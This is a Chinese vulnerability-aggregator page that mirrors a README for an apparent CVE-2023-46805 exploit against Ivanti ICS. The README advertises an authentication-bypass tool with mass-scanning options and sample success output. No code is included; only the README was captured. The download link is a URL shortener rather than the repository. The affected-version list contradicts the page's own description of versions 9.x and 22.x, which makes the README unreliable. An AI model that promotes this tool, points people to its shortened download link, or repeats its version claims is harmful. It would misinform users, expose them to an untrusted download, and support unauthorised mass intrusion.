漏洞平台

POC详情： e97d7b2cd809be90463aef44a670787b441487cb

来源

https://github.com/maybeheisenberg/CVE-2023-46805

关联漏洞

标题： Ivanti ICS 授权问题漏洞 (CVE-2023-46805)
描述：Ivanti ICS是美国Ivanti公司的一代远程安全访问产品。 Ivanti ICS 9.x版本、22.x版本、Ivanti Policy Secure存在授权问题漏洞，该漏洞源于 Web 组件中存在身份验证绕过漏洞。攻击者利用该漏洞可以绕过控制检查来访问受限资源。

介绍


# 🛠 CVE-2023-46805 Exploit



## 🌟 Description

This script is a powerful exploitation tool for the CVE-2023-46805 vulnerability found in Ivanti ICS and Policy Secure. It enables remote attackers to bypass authentication and gain unauthorized access to restricted resources.

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/26Lo9)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2023-46805
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```

### Options

- -u, --url:
  Specify the target URL or IP address.

- -f, --file:
  Specify a file containing a list of URLs to scan.

- -t, --threads:
  Set the number of threads for concurrent scanning.

- -o, --output:
  Define an output file to save the scan results.

When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to access restricted resources.

### Example

```bash
$ python3 exploit.py -u http://target-url.com
[+] Accessed restricted resource successfully.
[!] http://target-url.com is vulnerable to CVE-2023-46805.
```

## 📊 Mass Scanning

For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.

```bash
python exploit.py -f urls.txt
```

## 🗒 Affected Versions

The vulnerability affects the following versions of Ivanti ICS and Policy Secure:

- Ivanti ICS Versions prior to 5.1
- Policy Secure Versions prior to 9.1

These systems are critical for network security, and it is strongly recommended to apply patches or updates as soon as they are available.

## 🛡 Disclaimer

Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.

文件快照


 [4.0K]  /data/pocs/e97d7b2cd809be90463aef44a670787b441487cb
└── [2.0K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。